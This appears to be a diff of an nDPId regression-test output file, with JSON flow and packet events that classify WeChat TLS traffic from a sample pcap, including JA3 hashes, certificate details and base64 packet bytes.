-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":363,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1492167401410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167401410,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701JpITMTvRkX4aASN8iiggAAAgQFoAQCCApF0dMbADDo3wEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":364,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1492167401410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167401410,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0\/0BAAEAGFgTAqAFny82XotNSAbu9GRfhaSEzFIAQAOUHxwAAAQEICgAw6TZF0dMb"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":366,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167400812,"flow_last_seen":1492167401535,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167401535,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":368,"source":"wechat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167400812,"flow_last_seen":1492167401537,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167401537,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54097,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":374,"source":"wechat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1492167402013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1492167402013,"pkt":"eJKcD6iO8IQvSpdgCABFoABHL81AAC4G9pPLzZfTwKgBZwG7nyRpgH6Orb8\/fVAYAIMZWAAAFQMDABoY8p0q0Neyx8LzFoDelCtviTdTs0pFnXUR7g=="} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":382,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167401063,"flow_last_seen":1492167402310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167402310,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":389,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167401063,"flow_last_seen":1492167402665,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167402665,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":391,"source":"wechat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167401063,"flow_last_seen":1492167402666,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167402666,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54098,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"wechat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1492167422952,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167422952,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0KNBAAEAGqhvAqAFn2DrNjsJ7AbvMOVSD1yvysIAQAT2SvQAAAQEICgAw\/kAycps2"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167352068,"flow_last_seen":1492167352068,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167352068,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"64.233.167.188","src_port":36017,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1492167352068,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352068,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ePFAAEAGFx7AqAFnQOmnvIyxFGy60MyoSq1b+oAQAO38PQAAAQEICgAwuQeFnMDK"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"wechat.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1492167352122,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167352122,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0OfYAACsGqnlA6ae8wKgBZxRsjLFKrVv6utDMqYAQAWVTqwAAAQEICoWdcMgAL7Ej"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353674,"flow_last_seen":1492167353674,"flow_idle_time":7560000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1492167353674,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00737{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1492167353674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1492167353674,"pkt":"eJKcD6iO8IQvSpdgCABFoAD6dwRAACwGsNrLzZeiwKgBZwG70ypPgUs4IVggsIAYAQuBHwAAAQEICkXRpIYAMKn\/FwMDAMGOrZUQQd+ekzcfermPixMN7baWMlCLOjLGRLUay7A9ywN4ZUGmiUXDO1gdTDC98QU1t8eAbnyMFUBj5qM3d0y5XCUUPMCeBhhxcxN\/8G4Ch12FyipeyhGtwqgzXcsPc5ZQsJ\/Yfu\/XdVaAYYDYsfkQdrrVo9IGd6i0jIOj1GEXv+MuFcw5UP8MbQ5QLfOihRir7leYEOxmHGeDrisZkZBhOzKLL2Q5myihhKQJ9yeXWCsp\/s4j9ebB8kfX1kVSE8Aa"} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1492167353675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353675,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0n8JAAEAGdYLAqAFny82XotMqAbshWCCwT4FL\/oAQAcj35wAAAQEICgAwuphF0aSG"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.211","src_port":40741,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":82,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAAoXgBAAEAGtx\/AqAFny82X058lAbtnDvSGeC5ApFARAOXT9QAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54085,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0QwNAAEAG0kHAqAFny82XotNFAbtA8usy6z8oEoARAOWo0QAAAQEICgAwuptF0ZJx"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353687,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167353687,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1492167353687,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167353687,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8ZmlAAEAGrtPAqAFny82XotNJAbvI4NzyAAAAAKACchB6zAAAAgQFtAQCCAoAMLqbAAAAAAEDAwc="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167353937,"flow_last_seen":1492167353937,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167353937,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1492167353937,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167353937,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8a3xAAEAGqcDAqAFny82XotNKAbuhD9GmAAAAAKACchCtqQAAAgQFtAQCCAoAMLraAAAAAAEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1492167354015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354015,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0vARAACwGbKDLzZeiwKgBZwG700XrPygSQPLrM4ARAHCW2wAAAQEICkXRpNsAMLqb"} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"wechat.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1492167354015,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354015,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0QwRAAEAG0kDAqAFny82XotNFAbtA8usz6z8oE4AQAOWWFAAAAQEICgAwuu1F0aTb"} +00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1492167354046,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354046,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK49AAC4G+vDLzZfTwKgBZwG7nyV4LkCkZw70h1AQAHPUZwAA"} +00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"wechat.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAAoK5BAAC4G+u\/LzZfTwKgBZwG7nyV4LkCkZw70h1ARAHPUZgAA"} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354049,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG700mLgJvryODc86ASN8g1VAAAAgQFoAQCCApF8RJmADC6mwEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354049,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ZmpAAEAGrtrAqAFny82XotNJAbvI4Nzzi4Cb7IAQAOWalAAAAQEICgAwuvZF8RJm"} +00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353687,"flow_last_seen":1492167354049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167354049,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1492167354296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167354296,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG700oogx9AoQ\/Rp6ASN8hHnAAAAgQFoAQCCApF8RKkADC62gEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1492167354296,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167354296,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0a31AAEAGqcfAqAFny82XotNKAbuhD9GnKIMfQYAQAOWs3QAAAQEICgAwuzRF8RKk"} +00899{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167353687,"flow_last_seen":1492167354430,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167354430,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":100,"source":"wechat.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167353687,"flow_last_seen":1492167354487,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167354487,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54089,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} +00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":114,"source":"wechat.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167353937,"flow_last_seen":1492167355372,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167355372,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54090,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +02079{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"wechat.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1492167355388,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1254,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1254,"pkt_l4_len":1220,"thread_ts_msec":1492167355388,"pkt":"8IQvSpdgeJKcD6iOCABFAATYn8NAAEAGcN3AqAFny82XotMqAbshWCCwT4FL\/oAYAchBqgAAAQEICgAwvEVF0aSGFwMDBJ8AAAAAAAAACSCXh69SRVNj7LxTHyTa29lyIMx5rUn\/Kbsx2RSLcx6h5Rof7MvhSBslxiMA7RM+grN19AFhFkb86ybE4QzYLqZogvxRJjzavJpiSw0h2JHTRLw5hxkIJT93\/hBnX4KXAJggRKu+zDGdqHHdv4fTutm2SVgm7d7YrX77rNoEa49Z7tjdE+lO2DuQkrDWrkIcPj0eYPzI9xDvhacp1zu+uHhR194mvhqvVQzKnG9JQA7M8yc34zhOP58E3OjjXwz3ELzMbE8lsUYni0FdVDzD5AHz2ZXkJTACi6epY43d8swMwJs750LtRYiDdf+30r4284+LeVd8LVUpJU\/rrav+ZKJhyQ9sw9XMWliErx\/Hsl\/5h3MZRKZeqbDE6P8CmhyiQOuweltYgaOp1rsNtfHpo493xewTpz5snn5PbRcKUqFF5M4r7lhwPPhIeVK4WOUH\/33+Sq98q7EPLrHMUFohSF90hiJaXtAj+rHVK1gMf9oOJW2ySdU7MX2DS86yuQ6kfFtJuGuxo1Cz6PJoomwid9YpsbBbTMx6m4z9l\/ny1t10Pd97BylHaTo6YBGXBgtaz8dbyFkkD5Nbk5dwtmaGlM9uIlF\/rv5c1A55dbIdj8naBbyQ7fTwTJFbjISBkJmpaQoU2kc\/zziP44xaoDUxaRt9Ry\/806C0HPovj+JC6hKAJhd7IU3lz1cd2EcOR09Ulbh6GcnGtGoIEgMSnOqlHSHFOvhwMJOgqMdjV4Ts3j6kz4nuUL7P9W38WCZ6Et6v6MCfJC1NHlb+BiknubpqgZZ7mM9\/dQzJwaHAVm1pExnTA0Qtn9u2w0Ob0wTvtwWHLqB8+w1X5lLgz+g0\/KazNnFwZsVC8NJt7gXfJimXlNiQyyoVZPRU5TsryE76p7eJsfK2K3vD+oV2xOy0odJivKdVU9d\/b0lN4vXAAJXGR8apbNgPqwivAZHIvQdWqFgNwio4MLv0L8zBSqiIiaIpEMDbJPlGf3NTa8KHL9KuF0\/XkvPuIqyQ1vikTJWv3M0PfnYGX\/91JwgIycN3X4tfAJPTYU1bJR8H9lqbTS68wW7e8n7Z9kn4BsSK8WdGfSG\/BGchlsNazeLO6dljFOzNH1Nb0yqv79UpRl3Kr1HkZo+mQcyTmdDq73MBTVTodPICJb5JR1YLjVlWLyhlubA3PMAZhd7v493hq7IuxuvrhHldQDGHsYcPZ0+ZYWLqkDletWw1l3zV0GxsjRhJ3s